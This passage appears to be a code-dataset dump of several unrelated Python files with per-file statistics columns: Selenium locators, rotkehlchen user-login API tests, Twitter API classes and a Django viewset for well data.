'pi_description': "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'details-w-logo')]//p",
'pi_logo' : "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'logo')]//img",
}
class Groups2_Locators_Base_2(object):
"""
locators for Groups object
removed faq and guidelines links
added need_help link
locator change for popular section
hub version 1.2.0
"""
locators = {
'base' : "css=#content",
'need_help' : "css=#introduction .aside .popup",
'create' : "css=#useroptions .add",
'searchgroups' : "css=form.search",
'searchi' : "css=#gsearch",
'searchb' : "css=.search [type='submit']",
'browse' : "css=.group-intro-browse",
'popularinfo' : "css=.section > div:nth-of-type(2) .info",
'popularitem' : "css=.group-list",
'pi_title' : "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'details-w-logo')]//h3//a",
'pi_description': "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'details-w-logo')]//p",
'pi_logo' : "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'logo')]//img",
}
class Groups2_Locators_Base_3(object):
"""
locators for Groups object
updated need_help link locator
hub version 1.3.0
"""
locators = {
'base' : "css=#content",
'need_help' : "css=#introduction .popup",
'create' : "css=#useroptions .add",
'searchgroups' : "css=form.search",
'searchi' : "css=#gsearch",
'searchb' : "css=.search [type='submit']",
'browse' : "css=.group-intro-browse",
'popularinfo' : "css=.section > div:nth-of-type(2) .info",
'popularitem' : "css=.group-list",
'pi_title' : "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'details-w-logo')]//h3//a",
'pi_description': "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'details-w-logo')]//p",
'pi_logo' : "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'logo')]//img",
}
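# Hypothetical usage sketch (the `owner` object and the overridden selector are
# assumptions, not taken from the file above): a hub-specific locator can be
# overridden per instance through the locatordict argument.
#
#     groups = Groups2(owner, {'create': "css=#useroptions .group-add"})
#     groups.goto_create_group()
#     names = groups.get_popular_groups()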
| 39.121127
| 128
| 0.537514
| 1,474
| 13,888
| 4.960651
| 0.082768
| 0.07645
| 0.027079
| 0.069201
| 0.926696
| 0.904677
| 0.878009
| 0.873769
| 0.867615
| 0.861187
| 0
| 0.00663
| 0.283194
| 13,888
| 354
| 129
| 39.231638
| 0.727875
| 0.112615
| 0
| 0.819905
| 0
| 0.099526
| 0.425569
| 0.17694
| 0
| 0
| 0
| 0
| 0
| 1
| 0.080569
| false
| 0
| 0.018957
| 0
| 0.222749
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8aa0564d9df88d404d1898d1a62c286f0c9c2e24
| 136
|
py
|
Python
|
profiling/context.py
|
przemub/pwndbg
|
6fd42dd5ab8ed08a88d5da458bc2a6fce4e2ef33
|
[
"MIT"
] | 4,461
|
2016-05-30T17:14:06.000Z
|
2022-03-31T11:19:49.000Z
|
profiling/context.py
|
przemub/pwndbg
|
6fd42dd5ab8ed08a88d5da458bc2a6fce4e2ef33
|
[
"MIT"
] | 789
|
2016-05-27T21:17:52.000Z
|
2022-03-31T12:37:06.000Z
|
profiling/context.py
|
przemub/pwndbg
|
6fd42dd5ab8ed08a88d5da458bc2a6fce4e2ef33
|
[
"MIT"
] | 844
|
2016-06-01T00:37:04.000Z
|
2022-03-31T10:39:30.000Z
|
import pwndbg.commands.context
def warmup():
pwndbg.commands.context.context()
def run():
pwndbg.commands.context.context()
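# A minimal sketch (an assumption about how such warmup/run pairs are driven;
# pwndbg's profiling harness itself is not shown here):
#
#     import cProfile
#     warmup()                 # first call pays one-time import/caching costs
#     cProfile.run('run()')    # profile the steady-state context rendering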
| 13.6
| 37
| 0.720588
| 16
| 136
| 6.125
| 0.4375
| 0.428571
| 0.642857
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.147059
| 136
| 9
| 38
| 15.111111
| 0.844828
| 0
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| true
| 0
| 0.2
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8accbdf012ae7eedf32fd077f4f2a2d7bfd2fec0
| 173
|
py
|
Python
|
emukit/examples/preferential_batch_bayesian_optimization/pbbo/__init__.py
|
ndalchau/emukit
|
eb6754ea016a7cd82b275bb4075676b5ed662634
|
[
"Apache-2.0"
] | 152
|
2020-10-24T13:12:57.000Z
|
2022-03-25T11:35:41.000Z
|
emukit/examples/preferential_batch_bayesian_optimization/pbbo/__init__.py
|
ndalchau/emukit
|
eb6754ea016a7cd82b275bb4075676b5ed662634
|
[
"Apache-2.0"
] | 87
|
2020-10-26T10:29:25.000Z
|
2022-03-04T11:17:59.000Z
|
emukit/examples/preferential_batch_bayesian_optimization/pbbo/__init__.py
|
ndalchau/emukit
|
eb6754ea016a7cd82b275bb4075676b5ed662634
|
[
"Apache-2.0"
] | 41
|
2020-10-24T11:59:21.000Z
|
2022-03-22T17:08:30.000Z
|
from .gp_models import *
from .util import *
from .acquisitions import *
from .inferences import *
from .bayesian_optimization import *
| 28.833333
| 37
| 0.791908
| 21
| 173
| 6.380952
| 0.428571
| 0.373134
| 0.358209
| 0.447761
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.132948
| 173
| 6
| 38
| 28.833333
| 0.893333
| 0.208092
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
8acd759a7d72d5d5bd2daebfe7d528e13ea740d0
| 196
|
py
|
Python
|
code/nets/net_stf7b.py
|
huangshunliang/EEG-Grasp
|
296b3819562091901a5e5bb3801e40f5da12a0b6
|
[
"BSD-2-Clause"
] | 16
|
2015-09-18T02:09:27.000Z
|
2020-04-05T06:23:21.000Z
|
code/nets/net_stf7b.py
|
huangshunliang/EEG-Grasp
|
296b3819562091901a5e5bb3801e40f5da12a0b6
|
[
"BSD-2-Clause"
] | 2
|
2015-09-24T19:00:19.000Z
|
2015-10-02T14:39:57.000Z
|
code/nets/net_stf7b.py
|
huangshunliang/EEG-Grasp
|
296b3819562091901a5e5bb3801e40f5da12a0b6
|
[
"BSD-2-Clause"
] | 14
|
2015-10-06T23:47:06.000Z
|
2020-05-14T08:04:00.000Z
|
from . import net_stf7
def create_net(train_source, test_source, **kwargs):
return net_stf7.create_net(train_source, test_source, filter0_width=9, filter1_num=64, filter2_num=128, **kwargs)
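# Usage sketch (train_source/test_source are placeholders, an assumption for
# illustration): this wrapper pins three net_stf7 hyperparameters and forwards
# any remaining keyword arguments unchanged.
#
#     net = create_net(train_source, test_source)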
| 39.2
| 117
| 0.785714
| 31
| 196
| 4.612903
| 0.612903
| 0.097902
| 0.195804
| 0.27972
| 0.41958
| 0.41958
| 0
| 0
| 0
| 0
| 0
| 0.062857
| 0.107143
| 196
| 4
| 118
| 49
| 0.754286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
0a0cee4589bad81a869b636c6e03e8955035bb21
| 24,503
|
py
|
Python
|
rotkehlchen/tests/api/test_users.py
|
charlieknoll/rotki
|
fee58dba830f76ae91d116f05284e6afdfe23361
|
[
"BSD-3-Clause"
] | null | null | null |
rotkehlchen/tests/api/test_users.py
|
charlieknoll/rotki
|
fee58dba830f76ae91d116f05284e6afdfe23361
|
[
"BSD-3-Clause"
] | null | null | null |
rotkehlchen/tests/api/test_users.py
|
charlieknoll/rotki
|
fee58dba830f76ae91d116f05284e6afdfe23361
|
[
"BSD-3-Clause"
] | null | null | null |
from http import HTTPStatus
from pathlib import Path
from typing import Any, Dict
import pytest
import requests
from rotkehlchen.db.settings import ROTKEHLCHEN_DB_VERSION, DBSettings
from rotkehlchen.premium.premium import PremiumCredentials
from rotkehlchen.tests.utils.api import (
api_url_for,
assert_error_response,
assert_proper_response,
assert_simple_ok_response,
)
from rotkehlchen.tests.utils.premium import (
VALID_PREMIUM_KEY,
VALID_PREMIUM_SECRET,
create_patched_premium,
)
def check_proper_unlock_result(response_data: Dict[str, Any]) -> None:
assert response_data['result'] is not None
assert response_data['message'] == ''
result = response_data['result']
assert isinstance(result['exchanges'], list)
assert result['settings']['version'] == ROTKEHLCHEN_DB_VERSION
for setting in DBSettings._fields:
assert setting in result['settings']
def check_user_status(api_server) -> Dict[str, str]:
# Check users status
response = requests.get(
api_url_for(api_server, "usersresource"),
)
assert_proper_response(response)
data = response.json()
assert data['message'] == ''
return response.json()['result']
def test_loggedin_user_querying(rotkehlchen_api_server, username, data_dir):
"""Start with a logged in user and make sure we can query all users"""
Path(data_dir / 'another_user').mkdir()
Path(data_dir / 'another_user' / 'rotkehlchen.db').touch()
response = requests.get(api_url_for(rotkehlchen_api_server, "usersresource"))
assert_proper_response(response)
json = response.json()
assert json['result'][username] == 'loggedin'
assert json['result']['another_user'] == 'loggedout'
assert len(json['result']) == 2
@pytest.mark.parametrize('start_with_logged_in_user', [False])
def test_not_loggedin_user_querying(rotkehlchen_api_server, username, data_dir):
"""Start without logged in user and make sure we can query all users"""
Path(data_dir / 'another_user').mkdir()
Path(data_dir / 'another_user' / 'rotkehlchen.db').touch()
Path(data_dir / username).mkdir()
Path(data_dir / username / 'rotkehlchen.db').touch()
response = requests.get(api_url_for(rotkehlchen_api_server, "usersresource"))
assert_proper_response(response)
json = response.json()
assert json['result'][username] == 'loggedout'
assert json['result']['another_user'] == 'loggedout'
assert len(json['result']) == 2
@pytest.mark.parametrize('start_with_logged_in_user', [False])
def test_user_creation(rotkehlchen_api_server, data_dir):
"""Test that PUT at user endpoint can create a new user"""
# Create a user without any premium credentials
username = 'hania'
data = {
'name': username,
'password': '1234',
}
response = requests.put(api_url_for(rotkehlchen_api_server, "usersresource"), json=data)
assert_proper_response(response)
check_proper_unlock_result(response.json())
# Query users and make sure the new user is logged in
response = requests.get(api_url_for(rotkehlchen_api_server, "usersresource"))
assert_proper_response(response)
json = response.json()
assert json['result'][username] == 'loggedin'
assert len(json['result']) == 1
# Check that the directory was created
assert Path(data_dir / username / 'rotkehlchen.db').exists()
@pytest.mark.parametrize('start_with_logged_in_user', [False])
def test_user_creation_with_premium_credentials(rotkehlchen_api_server, data_dir):
"""Test that PUT at user endpoint can create a new user"""
# Create a user with premium credentials
username = 'hania'
data = {
'name': username,
'password': '1234',
'premium_api_key': VALID_PREMIUM_KEY,
'premium_api_secret': VALID_PREMIUM_SECRET,
}
rotki = rotkehlchen_api_server.rest_api.rotkehlchen
patched_premium_at_start, _, patched_get = create_patched_premium(
PremiumCredentials(VALID_PREMIUM_KEY, VALID_PREMIUM_SECRET),
patch_get=True,
metadata_last_modify_ts=0,
metadata_data_hash=b'',
metadata_data_size=0,
)
with patched_premium_at_start:
response = requests.put(api_url_for(rotkehlchen_api_server, "usersresource"), json=data)
assert_proper_response(response)
check_proper_unlock_result(response.json())
# Query users and make sure the new user is logged in
response = requests.get(api_url_for(rotkehlchen_api_server, "usersresource"))
assert_proper_response(response)
json = response.json()
assert json['result'][username] == 'loggedin'
assert len(json['result']) == 1
# Check that the directory was created
assert Path(data_dir / username / 'rotkehlchen.db').exists()
# Check that the user has premium
assert rotki.premium is not None
assert rotki.premium.credentials.serialize_key() == VALID_PREMIUM_KEY
assert rotki.premium.credentials.serialize_secret() == VALID_PREMIUM_SECRET
with patched_get:
assert rotki.premium.is_active()
@pytest.mark.parametrize('start_with_logged_in_user', [False])
def test_user_creation_with_invalid_premium_credentials(rotkehlchen_api_server, data_dir):
"""
Test that invalid and unauthenticated premium credentials are handled at new user creation
"""
# Create a user with invalid credentials
username = 'hania'
data = {
'name': username,
'password': '1234',
'premium_api_key': 'foo',
'premium_api_secret': 'boo',
}
response = requests.put(api_url_for(rotkehlchen_api_server, "usersresource"), json=data)
assert_error_response(
response=response,
contained_in_msg='Provided API/Key secret format is invalid',
)
# Check that the directory was NOT created
assert not Path(data_dir / username).exists(), 'The directory should not have been created'
# Create a new user with valid but not authenticable credentials
username = 'Anja'
data = {
'name': username,
'password': '1234',
'premium_api_key': VALID_PREMIUM_KEY,
'premium_api_secret': VALID_PREMIUM_SECRET,
}
response = requests.put(api_url_for(rotkehlchen_api_server, "usersresource"), json=data)
expected_msg = (
'Could not verify keys for the new account. Rotkehlchen API key was rejected by server'
)
assert_error_response(
response=response,
contained_in_msg=expected_msg,
status_code=HTTPStatus.CONFLICT,
)
# Check that the directory was NOT created
assert not Path(data_dir / username).exists(), 'The directory should not have been created'
# But check that a backup of the directory was made just in case
backups = list(Path(data_dir).glob('auto_backup_*'))
assert len(backups) == 1
assert 'auto_backup_Anja_' in str(backups[0]), 'An automatic backup should have been made'
# But then try to create a normal-non premium user and see it works
username = 'hania2'
data = {
'name': username,
'password': '1234',
}
response = requests.put(api_url_for(rotkehlchen_api_server, "usersresource"), json=data)
assert_proper_response(response)
check_proper_unlock_result(response.json())
# Query users and make sure the new user is logged in
response = requests.get(api_url_for(rotkehlchen_api_server, "usersresource"))
assert_proper_response(response)
json = response.json()
assert json['result'][username] == 'loggedin'
assert len(json['result']) == 2
# Check that the directory was created
assert Path(data_dir / username / 'rotkehlchen.db').exists()
@pytest.mark.parametrize('start_with_logged_in_user', [False])
def test_user_creation_errors(rotkehlchen_api_server, data_dir):
"""Test errors and edge cases for user creation"""
# Missing username
username = 'hania'
data = {
'password': '1234',
}
response = requests.put(api_url_for(rotkehlchen_api_server, "usersresource"), json=data)
assert_error_response(
response=response,
contained_in_msg='Missing data for required field',
)
# Missing password
username = 'hania'
data = {
'name': username,
}
response = requests.put(api_url_for(rotkehlchen_api_server, "usersresource"), json=data)
assert_error_response(
response=response,
contained_in_msg='Missing data for required field',
)
# Invalid type for name
data = {
'name': 5435345.31,
'password': '1234',
}
response = requests.put(api_url_for(rotkehlchen_api_server, "usersresource"), json=data)
assert_error_response(
response=response,
contained_in_msg='Not a valid string',
)
# Invalid type for password
data = {
'name': username,
'password': 4535,
}
response = requests.put(api_url_for(rotkehlchen_api_server, "usersresource"), json=data)
assert_error_response(
response=response,
contained_in_msg='Not a valid string',
)
# Provide only premium_api_key
data = {
'name': username,
'password': '1234',
'premium_api_key': 'asdsada',
}
response = requests.put(api_url_for(rotkehlchen_api_server, "usersresource"), json=data)
assert_error_response(
response=response,
contained_in_msg='Must provide both or neither of api key/secret',
)
# Provide only premium_api_secret
data = {
'name': username,
'password': '1234',
'premium_api_secret': 'asdsada',
}
response = requests.put(api_url_for(rotkehlchen_api_server, "usersresource"), json=data)
assert_error_response(
response=response,
contained_in_msg='Must provide both or neither of api key/secret',
)
# Invalid type for premium api key
data = {
'name': username,
'password': '1234',
'premium_api_key': True,
}
response = requests.put(api_url_for(rotkehlchen_api_server, "usersresource"), json=data)
assert_error_response(
response=response,
contained_in_msg='Not a valid string',
)
# Invalid type for premium api secret
data = {
'name': username,
'password': '1234',
'premium_api_secret': 45.2,
}
response = requests.put(api_url_for(rotkehlchen_api_server, "usersresource"), json=data)
assert_error_response(
response=response,
contained_in_msg='Not a valid string',
)
# Check that the directory was NOT created
assert not Path(data_dir / username / 'rotkehlchen.db').exists()
# Let's pretend there is another user, and try to create them again
Path(data_dir / 'another_user').mkdir()
Path(data_dir / 'another_user' / 'rotkehlchen.db').touch()
data = {
'name': 'another_user',
'password': '1234',
}
response = requests.put(api_url_for(rotkehlchen_api_server, "usersresource"), json=data)
assert_error_response(
response=response,
contained_in_msg='User another_user already exists',
status_code=HTTPStatus.CONFLICT,
)
def test_user_creation_with_already_loggedin_user(rotkehlchen_api_server, username):
"""Test that creating a user while another one is logged in fails"""
    # Try to create a user while another one is already logged in
data = {
'name': username,
'password': '1234',
}
response = requests.put(api_url_for(rotkehlchen_api_server, "usersresource"), json=data)
msg = (
f'Can not create a new user because user {username} is already logged in. '
f'Log out of that user first'
)
assert_error_response(
response=response,
contained_in_msg=msg,
status_code=HTTPStatus.CONFLICT,
)
def test_user_logout(rotkehlchen_api_server, username):
"""Test that user logout works succesfully and that common errors are handled"""
rotki = rotkehlchen_api_server.rest_api.rotkehlchen
# Logout of a non-existing/different user
data = {'action': 'logout'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name='nobody'),
json=data,
)
assert_error_response(
response=response,
contained_in_msg='Provided user nobody is not the logged in user',
status_code=HTTPStatus.CONFLICT,
)
assert rotki.user_is_logged_in is True
# Logout of the active user
data = {'action': 'logout'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
assert_simple_ok_response(response)
assert rotki.user_is_logged_in is False
# Now try to log out of the same user again
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
assert_error_response(
response=response,
contained_in_msg='No user is currently logged in',
status_code=HTTPStatus.CONFLICT,
)
assert rotki.user_is_logged_in is False
def test_user_login(rotkehlchen_api_server, username, db_password, data_dir):
"""Test that user login works properly"""
rotki = rotkehlchen_api_server.rest_api.rotkehlchen
# Let's pretend there is another user, and try to create them again
Path(data_dir / 'another_user').mkdir()
Path(data_dir / 'another_user' / 'rotkehlchen.db').touch()
# Check users status
users_data = check_user_status(rotkehlchen_api_server)
assert len(users_data) == 2
assert users_data[username] == 'loggedin'
assert users_data['another_user'] == 'loggedout'
# Logout of the active user
data = {'action': 'logout'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
assert_simple_ok_response(response)
assert rotki.user_is_logged_in is False
users_data = check_user_status(rotkehlchen_api_server)
assert len(users_data) == 2
assert users_data[username] == 'loggedout'
assert users_data['another_user'] == 'loggedout'
# Now let's try to login
data = {'action': 'login', "password": db_password, 'sync_approval': 'unknown'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
# And make sure it works
assert_proper_response(response)
check_proper_unlock_result(response.json())
assert rotki.user_is_logged_in is True
users_data = check_user_status(rotkehlchen_api_server)
assert len(users_data) == 2
assert users_data[username] == 'loggedin'
assert users_data['another_user'] == 'loggedout'
# Logout again
data = {'action': 'logout'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
assert_simple_ok_response(response)
assert rotki.user_is_logged_in is False
users_data = check_user_status(rotkehlchen_api_server)
assert len(users_data) == 2
assert users_data[username] == 'loggedout'
assert users_data['another_user'] == 'loggedout'
# Now try to login with a wrong password
data = {'action': 'login', "password": 'wrong_password', 'sync_approval': 'unknown'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
# And make sure it fails
assert_error_response(
response=response,
contained_in_msg='Wrong password or invalid/corrupt database for user',
status_code=HTTPStatus.UNAUTHORIZED,
)
users_data = check_user_status(rotkehlchen_api_server)
assert len(users_data) == 2
assert users_data[username] == 'loggedout'
assert users_data['another_user'] == 'loggedout'
# Now let's manually add valid but not authenticable premium credentials in the DB
data = {'action': 'login', "password": db_password, 'sync_approval': 'unknown'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
credentials = PremiumCredentials(VALID_PREMIUM_KEY, VALID_PREMIUM_SECRET)
rotki.data.db.set_rotkehlchen_premium(credentials)
data = {'action': 'logout'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
assert_simple_ok_response(response)
assert rotki.user_is_logged_in is False
# And try to login while having these unauthenticable premium credentials in the DB
data = {'action': 'login', "password": db_password, 'sync_approval': 'unknown'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
# And make sure it works despite having unauthenticable premium credentials in the DB
assert_proper_response(response)
check_proper_unlock_result(response.json())
assert rotki.user_is_logged_in is True
users_data = check_user_status(rotkehlchen_api_server)
assert len(users_data) == 2
assert users_data[username] == 'loggedin'
assert users_data['another_user'] == 'loggedout'
def test_user_set_premium_credentials(rotkehlchen_api_server, username):
"""Test that setting the premium credentials endpoint works.
We mock the server accepting the premium credentials
"""
rotki = rotkehlchen_api_server.rest_api.rotkehlchen
_, patched_premium_at_set, patched_get = create_patched_premium(
PremiumCredentials(VALID_PREMIUM_KEY, VALID_PREMIUM_SECRET),
patch_get=True,
metadata_last_modify_ts=0,
metadata_data_hash=b'',
metadata_data_size=0,
)
# Set premium credentials for current user
data = {'premium_api_key': VALID_PREMIUM_KEY, 'premium_api_secret': VALID_PREMIUM_SECRET}
with patched_premium_at_set:
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
assert_simple_ok_response(response)
assert rotki.premium is not None
assert rotki.premium.credentials.serialize_key() == VALID_PREMIUM_KEY
assert rotki.premium.credentials.serialize_secret() == VALID_PREMIUM_SECRET
with patched_get:
assert rotki.premium.is_active()
def test_user_set_premium_credentials_errors(rotkehlchen_api_server, username):
"""Test that setting the premium credentials endpoint reacts properly to bad input"""
# Set premium credentials for non-logged in user
data = {'premium_api_key': 'dadssad', 'premium_api_secret': 'jhjhkh'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name='another_user'),
json=data,
)
assert_error_response(
response=response,
contained_in_msg='Provided user another_user is not the logged in user',
status_code=HTTPStatus.CONFLICT,
)
# Set valid format but not authenticated premium credentials for logged in user
data = {'premium_api_key': VALID_PREMIUM_KEY, 'premium_api_secret': VALID_PREMIUM_SECRET}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
assert_error_response(
response=response,
contained_in_msg='Rotkehlchen API key was rejected by server',
status_code=HTTPStatus.UNAUTHORIZED,
)
def test_users_by_name_endpoint_errors(rotkehlchen_api_server, username, db_password):
"""Test that user by name endpoint errors are handled (for login/logout and edit)"""
rotki = rotkehlchen_api_server.rest_api.rotkehlchen
# Now let's try to login while the user is already logged in
data = {'action': 'login', 'password': db_password, 'sync_approval': 'unknown'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
expected_msg = (
f'Can not login to user {username} because user {username} is '
f'already logged in. Log out of that user first'
)
assert_error_response(
response=response,
contained_in_msg=expected_msg,
status_code=HTTPStatus.CONFLICT,
)
assert rotki.user_is_logged_in is True
# Logout of the active user
data = {'action': 'logout'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
assert_simple_ok_response(response)
assert rotki.user_is_logged_in is False
# Now let's try to login with an invalid password
data = {'action': 'login', 'password': 'wrong-password', 'sync_approval': 'unknown'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
assert_error_response(
response=response,
contained_in_msg='Wrong password or invalid/corrupt database for user',
status_code=HTTPStatus.UNAUTHORIZED,
)
assert rotki.user_is_logged_in is False
# Login action without a password
data = {'action': 'login', 'sync_approval': 'unknown'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
assert_error_response(
response=response,
contained_in_msg='Missing password field for login',
status_code=HTTPStatus.BAD_REQUEST,
)
assert rotki.user_is_logged_in is False
# No action and no premium credentials
data = {'sync_approval': 'unknown'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
assert_error_response(
response=response,
contained_in_msg='Without an action premium api key and secret must be provided',
status_code=HTTPStatus.BAD_REQUEST,
)
assert rotki.user_is_logged_in is False
# No action and only premium key
data = {'sync_approval': 'unknown', 'premium_api_key': VALID_PREMIUM_KEY}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
assert_error_response(
response=response,
contained_in_msg='Without an action premium api key and secret must be provided',
status_code=HTTPStatus.BAD_REQUEST,
)
assert rotki.user_is_logged_in is False
# No action and only premium secret
data = {'sync_approval': 'unknown', 'premium_api_secret': VALID_PREMIUM_SECRET}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
assert_error_response(
response=response,
contained_in_msg='Without an action premium api key and secret must be provided',
status_code=HTTPStatus.BAD_REQUEST,
)
assert rotki.user_is_logged_in is False
# Invalid action type
data = {'action': 555.3, 'password': db_password, 'sync_approval': 'unknown'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
assert_error_response(
response=response,
contained_in_msg='Not a valid string',
status_code=HTTPStatus.BAD_REQUEST,
)
assert rotki.user_is_logged_in is False
# Invalid action string
data = {'action': 'chopwood', 'password': db_password, 'sync_approval': 'unknown'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
assert_error_response(
response=response,
contained_in_msg='Must be one of: login, logout',
status_code=HTTPStatus.BAD_REQUEST,
)
assert rotki.user_is_logged_in is False
# Invalid password type
data = {'action': 'login', 'password': True, 'sync_approval': 'unknown'}
response = requests.patch(
api_url_for(rotkehlchen_api_server, "usersbynameresource", name=username),
json=data,
)
assert_error_response(
response=response,
contained_in_msg='Not a valid string',
status_code=HTTPStatus.BAD_REQUEST,
)
assert rotki.user_is_logged_in is False
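# These are pytest-style API tests; a minimal invocation sketch (standard
# pytest usage, not taken from the file above):
#
#     pytest rotkehlchen/tests/api/test_users.py -k "login or logout"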
| avg_line_length: 36.736132 | max_line_length: 96 | alphanum_fraction: 0.697302
| (remaining per-file qsc_* quality-signal columns omitted: unlabeled numeric spill)
| hexsha: 0a2147077a2f522f60c526f2f818598d8132fcc1 | size: 454 | ext: py | lang: Python
| path: twitter_api_v2/ContextAnnotation.py | repo: OldBigBuddha/twitter-api-v2-py | head: e64185e85725a7ca41a5b8cf6b4bff114e17a98f | licenses: ["MIT"]
| stars: 1 (2020-11-05T14:29:37.000Z) | issues: null | forks: null
from typing import Optional


class Domain:
    def __init__(self, id: str, name: str, description: Optional[str] = None) -> None:
        self.id: str = id
        self.name: str = name
        self.description: Optional[str] = description


class Entity:
    def __init__(self, id: str, name: str, description: Optional[str] = None) -> None:
        self.id: str = id
        self.name: str = name
        self.description: Optional[str] = description
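# A minimal usage sketch (hypothetical; the example values are illustrative,
# and any ContextAnnotation wrapper pairing the two classes is an assumption
# based on the file name, not shown in the dump):
# domain = Domain(id="46", name="Brand Category", description="Categories of brands")
# entity = Entity(id="10026378521", name="Twitter")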
| avg_line_length: 28.375 | max_line_length: 86 | alphanum_fraction: 0.629956
| (remaining per-file qsc_* quality-signal columns omitted: unlabeled numeric spill)
| hexsha: 0a4f563e5adf9ffb9863baea89804f9a1a7b326d | size: 2,598 | ext: py | lang: Python
| path: server/api/views/well_views.py | repo: dmitrytk/horizon | head: 8fc130d9d619de0e7ad7aad24d1e6f457bc68df0 | licenses: ["MIT"]
| stars: null | issues: null | forks: null
from rest_framework import viewsets
from rest_framework.decorators import action
from api.models import Well
from api.serializers import WellSerializer
from api.services import well_service
class WellViewSet(viewsets.ModelViewSet):
queryset = Well.objects.all()
serializer_class = WellSerializer
# Child objects
@action(detail=True, methods=['get', 'delete'])
def inclinometry(self, request, *args, **kwargs):
if request.method == 'GET':
return well_service.get_well_inclinometry(self.get_object().id)
elif request.method == 'DELETE':
return well_service.delete_well_inclinometry(self.get_object().id)
@action(detail=True, methods=['get', 'delete'])
def mer(self, request, *args, **kwargs):
if request.method == 'GET':
return well_service.get_well_mer(self.get_object().id)
elif request.method == 'DELETE':
return well_service.delete_well_mer(self.get_object().id)
@action(detail=True, methods=['get', 'delete'])
def rates(self, request, *args, **kwargs):
if request.method == 'GET':
return well_service.get_well_rates(self.get_object().id)
elif request.method == 'DELETE':
return well_service.delete_well_rates(self.get_object().id)
@action(detail=True, methods=['get', 'delete'])
def horizons(self, request, *args, **kwargs):
if request.method == 'GET':
return well_service.get_well_horizons(self.get_object().id)
elif request.method == 'DELETE':
return well_service.delete_well_horizons(self.get_object().id)
@action(detail=True, methods=['get', 'delete'])
def cases(self, request, *args, **kwargs):
if request.method == 'GET':
return well_service.get_well_cases(self.get_object().id)
elif request.method == 'DELETE':
return well_service.delete_well_cases(self.get_object().id)
@action(detail=True, methods=['get', 'delete'])
def perforations(self, request, *args, **kwargs):
if request.method == 'GET':
return well_service.get_well_perforations(self.get_object().id)
elif request.method == 'DELETE':
return well_service.delete_well_perforations(self.get_object().id)
@action(detail=True, methods=['get', 'delete'])
def pumps(self, request, *args, **kwargs):
if request.method == 'GET':
return well_service.get_well_pumps(self.get_object().id)
